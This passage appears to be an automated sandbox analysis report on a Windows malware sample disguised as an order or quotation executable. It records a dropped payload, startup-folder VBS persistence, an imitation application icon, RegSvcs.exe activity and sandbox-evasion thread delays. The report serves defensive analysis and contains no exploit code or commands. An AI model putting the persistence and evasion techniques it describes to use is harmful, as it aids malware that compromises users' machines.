              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP, source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb, source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: New Order RFQ- 19A20060.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: New Order RFQ- 19A20060.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: New Order RFQ- 19A20060.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: New Order RFQ- 19A20060.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: New Order RFQ- 19A20060.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00744B37 LoadLibraryA,GetProcAddress | 0_2_00744B37
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_0074C4C7 push A30074BAh; retn 0074h | 0_2_0074C50D
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00768945 push ecx; ret | 0_2_00768958
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FA8945 push ecx; ret | 1_2_00FA8958
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | File created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe

              Boot Survival

              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs

              Hooking and other Techniques for Hiding and Protection

              Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon1488.png
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_007448D7
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_007C5376
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 1_2_00F848D7
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_01005376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 1_2_01005376
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00763187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00763187
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | API/Special instruction interceptor: Address: 1602264
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | API/Special instruction interceptor: Address: 1142444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599874
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599765
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599653
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599546
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599246
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599133
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598918
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598702
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598483
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598373
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598263
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597919
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597811
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597702
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597484
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597374
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597264
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597036
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596912
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596541
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596435
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596327
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595233
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595015
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594906
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594796
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594686
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594568
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594421
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594292
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594184
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594047
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599519
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599391
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599014
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598734
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598625
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598516
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598406
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598297
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598187
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597859
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597641
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597516
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597391
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597172
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596733
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596474
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596284
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595937
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595828
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595391
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595172
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594844
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594734
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594625
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594516
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594406
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594297
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594187
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593747
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593531
              Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2473
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7371
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 4868
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 4968
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | API coverage: 4.4 %
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | API coverage: 4.7 %
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_007A445A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AC6D1 FindFirstFileW,FindClose | 0_2_007AC6D1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_007AC75C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_007AEF95
